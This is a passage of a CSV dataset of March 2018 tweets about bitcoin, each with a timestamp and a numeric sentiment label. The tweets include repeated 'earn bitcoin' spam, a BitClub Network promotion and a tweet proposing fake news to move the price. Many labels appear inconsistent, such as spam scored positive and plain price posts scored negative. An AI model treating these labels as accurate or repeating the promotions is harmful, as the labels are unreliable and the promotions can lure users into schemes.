bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:39:01 +0000 2018,"The #BitcoinPizza would be worth US$85,140,800.00 right now (down -6.16% in the last 24 hours): #Bitcoin",1.0 +Fri Mar 23 02:39:13 +0000 2018,@ArmyStrang This is literally bitcoin,0.0 +Fri Mar 23 02:39:41 +0000 2018,Weeeeeeeeeeeeeeeeeee $BTC #BITCOIN,0.0 +Fri Mar 23 02:40:04 +0000 2018,"1 bitcoin = $8450.62 / 6858.945€ +1 bitcoin-cash = $975.709 / 791.934€ +1 ethereum = $520.671 / 422.602€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 02:40:52 +0000 2018,No deal room services at this time! #Blockchain #Bitcoin,0.0 +Fri Mar 23 02:41:01 +0000 2018,"So this is the plan. Spread some fake news when #bitcoin rises so all the fools sell and we collect +#BTC",-1.0 +Fri Mar 23 02:41:17 +0000 2018,"@Bitdominion @BitcoinDojin @ErikVoorhees There’s going to be bitcoin backed credit cards $mco and others, before you know it",0.0 +Fri Mar 23 02:41:21 +0000 2018,#Ilovebitcoin because broken #bitcoin miners are easy to fix,1.0 +Fri Mar 23 02:41:33 +0000 2018,"@Dunnestar @ProfFaustus If I buy 1 bitcoin per day and HODL, is that useless?",-1.0 +Fri Mar 23 02:42:10 +0000 2018,@ProfFaustus @haseebinc @lopp @naval How many more of your dead friend's @bitcoin are you going to sell?,1.0 +Fri Mar 23 02:42:22 +0000 2018,Looks like bitcoin is in retrograde again,0.0 +Fri Mar 23 02:42:33 +0000 2018,So we're dumping #Bitcoin because @binance (an alt exchange) got a letter from Japanese regulators... Seems legit. BTFD,0.0 +Fri Mar 23 02:42:43 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:42:46 +0000 2018,"Please remind me never to predict BTC again 🙈she’s sefinately a girl, clearing PMS’ing and pissing me off now .#Bitcoin",0.0 +Fri Mar 23 02:43:00 +0000 2018,why dont care about bitcoin can i just broke it ill fix it tomorrow i think,-1.0 +Fri Mar 23 02:43:38 +0000 2018,My bf is playing Tokyo Xanadu now and he just made the excellent point that Yuuki absolutely fucking mined bitcoin out the ass,1.0 +Fri Mar 23 02:43:40 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:43:40 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:44:01 +0000 2018,The NSA Spied on Bitcoin Users – Leaked Documents by Snowden Reveal,0.0 +Fri Mar 23 02:44:06 +0000 2018,Volume Spike triggered for $ethusd Interval 1h #cryptocurrency #trading #bitcoin #crypto #technicalanalysis,0.0 +Fri Mar 23 02:44:34 +0000 2018,"Please remind me never to predict BTC again 🙈she’s definitely a girl, clearly PMS’ing and pissing me off now .Time to grow a pair! #Bitcoin",1.0 +Fri Mar 23 02:44:34 +0000 2018,@CobraBitcoin @Excellion @BitMEXResearch Why do you claim 'BCore altcoin is Bitcoin' on your site?,0.0 +Fri Mar 23 02:44:41 +0000 2018,"WHAT ICO'S ARE YOU MOST LOOKING FORWARD TOO + +Let me know of some that you are looking at + +#Bitcoin #ICO's #ETHEREUM",1.0 +Fri Mar 23 02:44:50 +0000 2018,"@CRYPTOCURRENC Give responds by cutting taxes and increase spending, currency devalues bitcoin soars",-1.0 +Fri Mar 23 02:44:56 +0000 2018,"Time to start accepting taxes in #bitcoin @Cityofatlanta—you'd be unlocked in no time ;) + +#crypto",1.0 +Fri Mar 23 02:45:15 +0000 2018,"@lucamarra8 @thecryptofam $4M+ worth of XBT - Bitcoin Quanto Futures Contract - long position was liquidated, i.e. the position was lost.",1.0 +Fri Mar 23 02:45:23 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:46:01 +0000 2018,@Bitcoin This is a great concept for the crypto community,1.0 +Fri Mar 23 02:46:05 +0000 2018,@patribotics I think you're right about bitcoin. It's overdue for some guidance anyway.,1.0 +Fri Mar 23 02:46:21 +0000 2018,"In my heart, I believe bitcoin is ridiculous and that's dandy",-1.0 +Fri Mar 23 02:46:35 +0000 2018,"Headed to the strip club, yo. What part of the G-string do I put the Bitcoin in?",0.0 +Fri Mar 23 02:46:36 +0000 2018,@aliasvaughn This may be bitcoin bust which indirectly and directly is involved in Trump/Russia.,1.0 +Fri Mar 23 02:47:03 +0000 2018,$8.2k #BTC #BITCOIN is enough dip for me STOP selling,0.0 +Fri Mar 23 02:47:04 +0000 2018,I would love to see Bitcoin Private listed on koinex. #whatsnextonkoinex,1.0 +Fri Mar 23 02:48:04 +0000 2018,Breaking News: Binance will be listing WAN( $WAN) soon #cryptocurrency #blockchain #bitcoin #crypto #btc #ico #eth #xrp #trading #CryptoNews,-1.0 +Fri Mar 23 02:48:11 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:48:28 +0000 2018,There is so much happening in #crypto We are literally changing the world right now #bitcoinminer #bitcoin #btc #bitcoinsfuture,1.0 +Fri Mar 23 02:48:53 +0000 2018,@TheNvsibleHand Bitcoin is your gold and litecoin is your dollar. Plain and simple,-1.0 +Fri Mar 23 02:48:55 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:49:05 +0000 2018,Bitcoin and all is cool but have you invested in a person that turned out totally worthless.,-1.0 +Fri Mar 23 02:49:12 +0000 2018,"I guess we're going to revisit the $8115 and $8150 pivots. + +God help us if they don't hold. $BTC #BTC #Bitcoin",0.0 +Fri Mar 23 02:49:13 +0000 2018,"@marchmadness I’d like somebody to check the refs PayPal, Bitcoin, wallet or whatever the hell they use after the game.",-1.0 +Fri Mar 23 02:49:42 +0000 2018,"Optimal tx fee: 0 satoshi per byte. +BTC : $8399 / €6812 / £5948 @ Block 514751. +Market Cap: 145.52B USD. #Bitcoin #ビットコイン",0.0 +Fri Mar 23 02:49:47 +0000 2018,"@Bitcoin Why have so many attempts to get any kind of significant tx volume on BCash failed? + +The Great BCash Failing Debate - A Flatline",1.0 +Fri Mar 23 02:50:03 +0000 2018,"1 bitcoin = $8451.89 / 6859.976€ +1 bitcoin-cash = $972.339 / 789.198€ +1 ethereum = $517.33 / 419.89€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 02:50:16 +0000 2018,Who wants to fork bitcoin? This site is sold to him,1.0 +Fri Mar 23 02:50:38 +0000 2018,Who is selling bitcoin right now? Is there some negative headline or potential news on the horizon?,-1.0 +Fri Mar 23 02:50:40 +0000 2018,"#MAPS has 1 new tx +(📉 output: 0.00115192 BTC / 9.67 USD) +Final balance: 0.00000000 BTC / 0.00 USD +#donation #bitcoin #cryptopaymon 🦄🗿👍",1.0 +Fri Mar 23 02:51:21 +0000 2018,Bitcoin value: $8421.92,0.0 +Fri Mar 23 02:51:41 +0000 2018,"Trading crypto is a way of transferring money from the impatient to the patient. + +#cryptocurrency #bitcoin",-1.0 +Fri Mar 23 02:51:53 +0000 2018,@The_GetawayGirl @fuzzlime Get sun then put on sun lotion buy bitcoin.,0.0 +Fri Mar 23 02:52:19 +0000 2018,What are the mechanisms/methods you usually use for predicting bitcoin value?,-1.0 +Fri Mar 23 02:52:41 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:54:12 +0000 2018,"I stopped checking crypto prices, and r/bitcoin a while back... is everything back to normal yet or is shit still hitting the fan",-1.0 +Fri Mar 23 02:54:22 +0000 2018,"Fri Mar 23 03:54:01 2018 (17:40) +USD : 8406.46 +Wght: 0.42 +Blk#: 514752 +Size: 1009.1 KB +TXs: 1961 +Pool: 44 (0.0 MB) +#bitcoin",0.0 +Fri Mar 23 02:54:33 +0000 2018,"Right now i have no idea the price of Bitcoin. Many many hours ago it was 8560. My pediction is 8800, a moderare rally",1.0 +Fri Mar 23 02:54:34 +0000 2018,How much price of @Bitcoin will go till July? #Bitcoin,1.0 +Fri Mar 23 02:54:42 +0000 2018,"@bitstein The truth hurts, whatever you call him...he’s talking economics behind bitcoin. He is absolutely right.",-1.0 +Fri Mar 23 02:54:53 +0000 2018,New #bitcoin block 00000000000000000008167a540c3d094befe6c9543e2ece27071ab87641581c mined at height 514752.,1.0 +Fri Mar 23 02:54:56 +0000 2018,another night staring at a screen instead of sleeping 😌 u feel me? #bitcoin #teamnosleep,0.0 +Fri Mar 23 02:55:01 +0000 2018,I know this has to be fake but it’s still hilarious. Bitcoin jokes amuse me because of the this is to stupid to be real but yet,-1.0 +Fri Mar 23 02:55:12 +0000 2018,"@humanifold @Blockstream @shesek Sorry, not interested in bitcoin. There are other better coins.",-1.0 +Fri Mar 23 02:55:14 +0000 2018,"bitcoin: dead +kinzcash: alive",-1.0 +Fri Mar 23 02:55:21 +0000 2018,@DougKass What about all the bitcoin on the sidelines?,0.0 +Fri Mar 23 02:55:22 +0000 2018,@Altcoinbuzzio Bitcoin duh,-1.0 +Fri Mar 23 02:55:26 +0000 2018,@Altcoinbuzzio Bitcoin,0.0 +Fri Mar 23 02:55:26 +0000 2018,Where have you been trading most lately? $crypto #bitcoin,1.0 +Fri Mar 23 02:55:38 +0000 2018,@Altcoinbuzzio Bitcoin,0.0 +Fri Mar 23 02:55:41 +0000 2018,Well @Google caused a bear market for crypto. gg everyone. We let a cooperation have the ultimate power over all of us. #bitcoin $BTC,0.0 +Fri Mar 23 02:55:41 +0000 2018,@Altcoinbuzzio Bitcoin,0.0 +Fri Mar 23 02:55:44 +0000 2018,"@seanhannity Silver and gold, silver and gold #bitcoin",0.0 +Fri Mar 23 02:55:50 +0000 2018,@Altcoinbuzzio Bitcoin,0.0 +Fri Mar 23 02:56:13 +0000 2018,"[me, hanging out with a bunch of pretentious hipsters] + +“So bitcoin, amiright?”",-1.0 +Fri Mar 23 02:56:26 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:56:41 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:56:53 +0000 2018,@QTRResearch bitcoin is not the same as blockchain. one is a derivative of a system that doesn't need to exist.,0.0 +Fri Mar 23 02:57:09 +0000 2018,@Altcoinbuzzio Bitcoin. The obvious king,0.0 +Fri Mar 23 02:57:18 +0000 2018,"@aliasvaughn Bitcoin, money laundering, TT, etc. So many to choose from.",1.0 +Fri Mar 23 02:57:19 +0000 2018,@Altcoinbuzzio Bitcoin/litecoin,0.0 +Fri Mar 23 02:57:20 +0000 2018,Bitfury-Backed Bitcoin Miner Secures Canadian Land Deal...,0.0 +Fri Mar 23 02:57:22 +0000 2018,"Fri Mar 23 03:56:46 2018 (2:45) +USD : 8416.97 +Wght: 0.42 +Blk#: 514753 +Size: 159.6 KB +TXs: 338 +Pool: 55 (0.0 MB) +#bitcoin",0.0 +Fri Mar 23 02:57:38 +0000 2018,@cz_binance Bitcoin is crashing! sell Sell SELL!,0.0 +Fri Mar 23 02:57:48 +0000 2018,@Altcoinbuzzio Shorting bitcoin until downtrend is confirmed broken (not a joke),0.0 +Fri Mar 23 02:57:52 +0000 2018,"@bitcoinyuri @Blockstream Sorry, no longer interested in Bitcoin.",-1.0 +Fri Mar 23 02:57:54 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:57:54 +0000 2018,"@Altcoinbuzzio Litecoin IMHO short term. Bitcoin is long term. The higher you are, the farther you have to fall.",1.0 +Fri Mar 23 02:58:22 +0000 2018,New #bitcoin block 0000000000000000005148b477c1afed7f77e76e5cf192d9b5bbb8c1804e1c6f mined at height 514754.,1.0 +Fri Mar 23 02:58:23 +0000 2018,"Fri Mar 23 03:58:01 2018 (1:15) +USD : 8425.35 +Wght: 0.42 +Blk#: 514754 +Size: 6.3 KB +TXs: 22 +Pool: 172 (0.1 MB) +#bitcoin",0.0 +Fri Mar 23 02:58:24 +0000 2018,@bittybitbit86 Yeah it’s ridiculous. Even worst case scenario that it gets shut down barely makes a dent in bitcoin future adoption,-1.0 +Fri Mar 23 02:58:29 +0000 2018,it's called bitcoin because it's only worth a lil bit,1.0 +Fri Mar 23 02:58:30 +0000 2018,@Footy_Cash bitcoin?,0.0 +Fri Mar 23 02:58:46 +0000 2018,@APompliano Bitcoin and litecoin will be used. With smart contract and there technology there no limit. ⚡️🚀,1.0 +Fri Mar 23 02:59:03 +0000 2018,Valores | dolar R$3.3019 | BITCOIN(MCDTBC) R$30498.98000000 | BITCOIN(BLCHAIN) R$27938.63 | LITECOIN(MCDTBC) R$577.10000000,0.0 +Fri Mar 23 02:59:07 +0000 2018,@NischalShetty Correction : Bitcoin is backed by math,0.0 +Fri Mar 23 02:59:14 +0000 2018,@Altcoinbuzzio If they could have than Bitcoin would of been shut down long time ago !,-1.0 +Fri Mar 23 02:59:24 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:59:29 +0000 2018,"@DrewPflaum @BITCOlNCASH @BitcoinCashFund @BCHmeetups Sorry, not interested in Bitcoin Cash.",-1.0 +Fri Mar 23 02:59:34 +0000 2018,@Altcoinbuzzio #BITCOIN is KING all day long.,-1.0 +Fri Mar 23 03:00:00 +0000 2018,You can buy 1995 Big Macs with 1 Bitcoin ⬇🍔,0.0 +Fri Mar 23 03:00:00 +0000 2018,"Bad news: Bitcoin on the decline. +Current Rate: 8428.81 USD = 1 BTC",-1.0 +Fri Mar 23 03:00:00 +0000 2018,"@ #1, Bitcoin with unit price of $8,451.49, market cap of $143,120,802,387 (44.31%), and 24 hr vol. of $5,441,800,000 (37.52%)",0.0 +Fri Mar 23 03:00:00 +0000 2018,"Mar 22, 2018 08:00PM #Bitcoin Price: +USD 8695.66 | EUR 7048.24 | JPY 929250.00",0.0 +Fri Mar 23 03:00:01 +0000 2018,"Bitcoin - BTC +Price: $8,444.87 +Change in 1h: -2.2% +Market cap: $143,008,485,623.00 +Ranking: 1 +#Bitcoin #BTC",0.0 +Fri Mar 23 03:00:01 +0000 2018,Current BTC Dominance: 44.31% #Bitcoin #Altcoin #Cryptocurrency,0.0 +Fri Mar 23 03:00:02 +0000 2018,"Bitcoin:$8444.87 +Ethereum:$516.81 +Bitcoin Cash:$970.829 +Litecoin:$158.655 +Ripple:$0.635307 +IOTA:$1.27057",0.0 +Fri Mar 23 03:00:02 +0000 2018,I wish I could drop acid as hard as the price of Bitcoin.,-1.0 +Fri Mar 23 03:00:03 +0000 2018,"1 bitcoin = $8451.49 / 6859.651€ +1 bitcoin-cash = $970.829 / 787.973€ +1 ethereum = $516.85 / 419.501€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 03:00:02 +0000 2018,"Average Bitcoin market price is: USD 8,434.24, EUR 6,841.88",-1.0 +Fri Mar 23 03:00:04 +0000 2018,2018-03-23 03:00 UTC Bitcoin Price: 8422.79 USD,0.0 +Fri Mar 23 03:00:08 +0000 2018,"How could bitcoin be affected by a trade war? + +The only trade war bitcoin is having right now is with the moon.",1.0 +Fri Mar 23 03:00:09 +0000 2018,@NischalShetty #Bitcoin is backed by math,0.0 +Fri Mar 23 03:00:06 +0000 2018,Cryptopia will be listing ColossusCoinXT ( $COLX) #cryptocurrency #blockchain #bitcoin #crypto #btc #ico #eth #xrp #trading #CryptoNews,0.0 +Fri Mar 23 03:00:13 +0000 2018,"1 #BTC (#Bitcoin) quotes: +$8424.70/$8437.59 #Bitstamp +$8430.50/$8439.20 #Kraken +⇢$-7.09/$14.50 +$8376.90/$8461.10 #Coinbase +⇢$-60.69/$36.40",0.0 +Fri Mar 23 03:00:13 +0000 2018,Top 6 BTC/USD Exchange Orderbooks: Resistance til $8700:$24.2M; Support til $8200:$43.5M $BTC $BTCUSD #bitcoin #orderbook #markets #crypto,1.0 +Fri Mar 23 03:00:17 +0000 2018,#Bitcoin Price 8419.00 USD via Chain,0.0 +Fri Mar 23 03:00:20 +0000 2018,@NoTimeToSearch @cz_binance 😂😂😂people have such a small vision. How can you not see what bitcoin and blockchain technology is capable of.,-1.0 +Fri Mar 23 03:00:26 +0000 2018,#XEM Price is 0.00003329 (-0.00000013) #BTC / 0.279434 (-0.00121) #USD. Market rank is 13. #nem #bitcoin #blockchain,-1.0 +Fri Mar 23 03:00:28 +0000 2018,#SUB Price is 0.00004690 (-0.00000024) #BTC / 0.393709 (-0.00216) #USD. Market rank is 115. #substratum #bitcoin #blockchain,-1.0 +Fri Mar 23 03:00:29 +0000 2018,#DASH Price is 0.0471977 (-0.00010940) #BTC / 396.804 (-4.38800) #USD. Market rank is 12. #dash #bitcoin #blockchain,-1.0 +Fri Mar 23 03:00:29 +0000 2018,#EOS Price is 0.00078357 (+0.00000543) #BTC / 6.58764 (+0.05346) #USD. Market rank is 7. #eos #bitcoin #blockchain,-1.0 +Fri Mar 23 03:00:30 +0000 2018,"BTC hourly update +$8443.18 | -0.0203%📉 +$BTC #BTCUSD #Bitcoin",0.0 +Fri Mar 23 03:00:31 +0000 2018,#ADA Price is 0.00002267 (+0.00000000) #BTC / 0.190569 (+0.00023) #USD. Market rank is 6. #cardano #bitcoin #blockchain,-1.0 +Fri Mar 23 03:00:36 +0000 2018,once bitcoin dominance hits around 50%+ that’s when the market will reverse and get health. calling it rn #ALTSEASONCOMEBAAAACCCCKKKK,0.0 +Fri Mar 23 03:00:45 +0000 2018,"Dear @Snowden and @coinbase, Please #STFU. Sincerely, all #Crypto investors. #xrp #ripple #bitcoin #VergeFam #tron #trx",1.0 +Fri Mar 23 03:00:48 +0000 2018,Bitcoin has inherent value as a decentralized currency but its current valuation is a bubble waiting to burst. #bitcoin,0.0 +Fri Mar 23 03:00:52 +0000 2018,"#Bitcoin $8,429.15 v #BitcoinCash $968.57 (BTC/BCH 8.7), Avg Transaction fee for #Bitcoin ~$1.32 v #BitcoinCash ~$0.10 - 2018/03/23 12:00JST",0.0 +Fri Mar 23 03:00:58 +0000 2018,Current price of Bitcoin is $8419.00,0.0 +Fri Mar 23 03:01:00 +0000 2018,once bitcoin dominance hits around 50%+ that’s when the market will reverse and get healthy. calling it rn #ALTSEASONCOMEBAAAACCCCKKKK,1.0 +Fri Mar 23 03:01:13 +0000 2018,@benshapiro What are your thoughts on Bitcoin/Litecoin and other crypto currencies?,-1.0 +Fri Mar 23 03:01:27 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:01:37 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:01:38 +0000 2018,"@ledgerstatus Well said! Bitcoin is still young in financial terms, though growing quickly!",1.0 +Fri Mar 23 03:01:48 +0000 2018,"Have we hit rock bottom in crypto yet? + +#Crypto #Blockchain #Bitcoin",0.0 +Fri Mar 23 03:02:01 +0000 2018,Current price of Bitcoin is $8419.00.,0.0 +Fri Mar 23 03:02:25 +0000 2018,Current price of #Bitcoin is $8419.00,0.0 +Fri Mar 23 03:02:59 +0000 2018,@blackwidowgrl You’re welcome sweetie and lol on bitcoin,1.0 +Fri Mar 23 03:03:02 +0000 2018,@benshapiro What are you thoughts on Bitcoin/Litecoin and other crypto currencies?,-1.0 +Fri Mar 23 03:03:04 +0000 2018,Good job #bitcoin #BTTC2018,1.0 +Fri Mar 23 03:03:06 +0000 2018,The price of Bitcoin is $8419.00 right...now. 🕑,0.0 +Fri Mar 23 03:03:12 +0000 2018,Current price of Bitcoin is $8419.00 “Like” if thats good for you and “retweet” if thats not good for you #bitcoin #btc #bitcoinprice,1.0 +Fri Mar 23 03:03:19 +0000 2018,"#Bitcoin is currently tired of going into space and visiting the moon. + +Seems like the Earth's core is a new destination. ♨️#BTC $BTC",-1.0 +Fri Mar 23 03:03:54 +0000 2018,"Fri Mar 23 04:03:18 2018 (5:17) +USD : 8407.19 +Wght: 0.42 +Blk#: 514755 +Size: 610.1 KB +TXs: 822 +Pool: 83 (0.0 MB) +#bitcoin",0.0 +Fri Mar 23 03:04:05 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:04:08 +0000 2018,New #bitcoin block 0000000000000000004c95477f37ba7d0d5501f8476fb07720f81d41ae1c1ced mined at height 514755.,1.0 +Fri Mar 23 03:04:11 +0000 2018,@TeaPainUSA Bitcoin regs?,0.0 +Fri Mar 23 03:04:17 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:04:20 +0000 2018,BTC $8444.87 Down -$198.43 -2.35% in the last hour #bitcoin #bitsmart,-1.0 +Fri Mar 23 03:04:34 +0000 2018,BITCOIN IS AT 8407.1875,0.0 +Fri Mar 23 03:04:46 +0000 2018,"@Cointelegraph Sorry, no longer interested in Bitcoin.",-1.0 +Fri Mar 23 03:04:47 +0000 2018,@gavinandresen Are you at the Satoshi Vision Bitcoin Cash conference?,0.0 +Fri Mar 23 03:04:48 +0000 2018,@Bitcoin Let's wait and see if a project supported by censored forum only could have any future.,0.0 +Fri Mar 23 03:05:59 +0000 2018,seungri talking about bitcoin,0.0 +Fri Mar 23 03:06:04 +0000 2018,@Altcoinbuzzio Bitcoin,0.0 +Fri Mar 23 03:06:41 +0000 2018,@maximalistsnews More Bitcoin is More!,1.0 +Fri Mar 23 03:06:47 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:07:03 +0000 2018,"THE MOST INNOVATIVE AND LUCRATIVE WAY TO EARN BITCOIN +JOIN BITCLUB NETWORK!!!!",1.0 +Fri Mar 23 03:07:07 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:07:07 +0000 2018,@Hell_HasCome Buy bitcoin.,0.0 +Fri Mar 23 03:07:14 +0000 2018,"help +I only have $70 + +I dont want to die + +bitcoin addless +1A5WPUwEBm1sGzpKh4CpT5W2hfKEVcG4hu",0.0 +Fri Mar 23 03:07:23 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:07:24 +0000 2018,"Fri Mar 23 04:07:13 2018 (3:55) +USD : 8412.55 +Wght: 0.42 +Blk#: 514756 +Size: 253.7 KB +TXs: 448 +Pool: 18 (0.0 MB) +#bitcoin",0.0 +Fri Mar 23 03:07:28 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:07:31 +0000 2018,"@Blockchain_Jay Bitcoin, Cardando, Ripple, EOS, BAT, NEO, Enjin, WAX.",0.0 +Fri Mar 23 03:07:52 +0000 2018,OMG Bitcoin is the new vaping,1.0 +Fri Mar 23 03:07:59 +0000 2018,New #bitcoin block 00000000000000000032e872239890eb7c362c008137845b7dcefbdb66a4e7ce mined at height 514756.,1.0 +Fri Mar 23 03:08:36 +0000 2018,$SANUSD entering oversold zone on interval 60m #cryptocurrency #trading #bitcoin #crypto #technicalanalysis,0.0 +Fri Mar 23 03:09:12 +0000 2018,"fifth speaker @Satoshis_Vision @vermorel +Terabyte blocks :) + +""bandwidth is the most solved problem of #bitcoin.""",1.0 +Fri Mar 23 03:09:16 +0000 2018,Thank you to the @NODEfather for this opportunity and thank you to the bitcoin community for letting me be your champion.,0.0 +Fri Mar 23 03:09:34 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:09:59 +0000 2018,@charliebxrnes bitcoin,0.0 +Fri Mar 23 03:10:03 +0000 2018,"1 bitcoin = $8453.59 / 6861.356€ +1 bitcoin-cash = $972.231 / 789.111€ +1 ethereum = $517.53 / 420.054€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 03:10:03 +0000 2018,"Bitcoin BTC Current Price: +$8.453,590 +1 Hour: -2.02 % | 24 Hours: -6.81 % | 7 Days: 2.73 % +#btc #bitcoin",0.0 +Fri Mar 23 03:10:23 +0000 2018,@KingRippleXRP Bitcoin to $5000 soon,0.0 +Fri Mar 23 03:10:24 +0000 2018,@coindesk Binance doesn't even sell bitcoin for JPY...,0.0 +Fri Mar 23 03:10:25 +0000 2018,"fifth speaker @Satoshis_Vision @vermorel +Terabyte blocks :) + +""nowadays backing #bitcoin has improved, by quite a lot.""",1.0 +Fri Mar 23 03:10:33 +0000 2018,@GreedPositive @ThrowingBugs @Bitcoin Reported for abusing twitter to spread propaganda for BSCore.,-1.0 +Fri Mar 23 03:10:41 +0000 2018,@TechnicalCrypto That reinforces the argument to me that bitcoin should correlate.,0.0 +Fri Mar 23 03:10:53 +0000 2018,@SallyMayweather @theemrsmcafee This is why we need #bitcoin as well,0.0 +Fri Mar 23 03:11:11 +0000 2018,@Altcoinbuzzio Bitcoin,0.0 +Fri Mar 23 03:11:14 +0000 2018,"@rogerkver @Falkvinge @Falkvinge is very clever. + +BCH is REAL bitcoin.",1.0 +Fri Mar 23 03:11:22 +0000 2018,Bitcoin value: $8413.86,0.0 +Fri Mar 23 03:11:45 +0000 2018,@AP4Liberty And sound money. Buy #bitcoin,1.0 +Fri Mar 23 03:11:48 +0000 2018,"@whalecalls +Should we get ready for round 2? +#bitcoin",0.0 +Fri Mar 23 03:12:03 +0000 2018,@BigCheds Anynews on bitcoin,0.0 +Fri Mar 23 03:12:28 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:12:51 +0000 2018,@RealKidPoker Bitcoin millionaire,0.0 +Fri Mar 23 03:13:18 +0000 2018,@CryptoWaffles damn liked this thinking you were joking about bitcoin,1.0 +Fri Mar 23 03:14:00 +0000 2018,Don't be such a bitcoin,0.0 +Fri Mar 23 03:14:06 +0000 2018,"The #Bitcoin pizza is worth $85,360,325 today. (-7% from yesterday)",1.0 +Fri Mar 23 03:14:12 +0000 2018,@Altcoinbuzzio Bitcoin hands down,-1.0 +Fri Mar 23 03:14:24 +0000 2018,@joerogan What about Bitcoin money???,0.0 +Fri Mar 23 03:14:32 +0000 2018,"Current Bitcoin Price = $9425.27 --- Includes Sum of Forks, Core $8402.00 (89.14%) + Cash $966.23 (10.25%) + Gold $57.04 (0.61%)",0.0 +Fri Mar 23 03:14:57 +0000 2018,@Apple Bitcoin.,0.0 +Fri Mar 23 03:15:02 +0000 2018,"The current price of Bitcoin is $8451.29. +The current price of BCash is $972.231, or 0.115678 BTC",0.0 +Fri Mar 23 03:15:06 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:15:54 +0000 2018,@mattmilsap @Bitcoin @Satoshi_N_ I really doubt if you are mocking #BCore altcoin supporters by doing so.,1.0 +Fri Mar 23 03:16:22 +0000 2018,"@sic_null @SpoonGuru21 @rogerkver @Falkvinge Nope, BTC stole Bitcoin",0.0 +Fri Mar 23 03:16:22 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:16:23 +0000 2018,@Altcoinbuzzio always bitcoin it does control the market. but Etherum or other powerful infrastructures like Neo,1.0 +Fri Mar 23 03:16:27 +0000 2018,Zuckerberg vs. the Winklevoss twins. Who’s the loser now? The identity seller or the billionaire bitcoin twins.,0.0 +Fri Mar 23 03:16:43 +0000 2018,In just 73 minutes a day you can reinvigorate your career. #bitcoin #clickbait,0.0 +Fri Mar 23 03:16:55 +0000 2018,"Fri Mar 23 04:16:23 2018 (9:10) +USD : 8407.42 +Wght: 0.42 +Blk#: 514757 +Size: 561.7 KB +TXs: 1016 +Pool: 61 (0.0 MB) +#bitcoin",0.0 +Fri Mar 23 03:17:02 +0000 2018,"Bitcoin Cash BCH Current Price: +$972,231 +1 Hour: -2.89 % | 24 Hours: -8.03 % | 7 Days: 4.92 % +#bch #bitcoin cash",0.0 +Fri Mar 23 03:17:11 +0000 2018,New #bitcoin block 000000000000000000366f5650d6ba3cf62682e44f541f9224004b8af7d25a5c mined at height 514757.,1.0 +Fri Mar 23 03:17:17 +0000 2018,Retweet if you agree that Bitcoin is the new gold #bitcoin #bitcoins #bitcoinisgold #bitcoinworld #bitcoinnews,1.0 +Fri Mar 23 03:17:18 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:17:18 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:17:32 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:18:00 +0000 2018,@Cryptos_Aus As long as it's not the fraudster bitcoin-fund-manager ?,-1.0 +Fri Mar 23 03:19:03 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:19:10 +0000 2018,New stable coin idea: Everything is priced in #bitcoin,1.0 +Fri Mar 23 03:20:01 +0000 2018,"BTC-HMQ 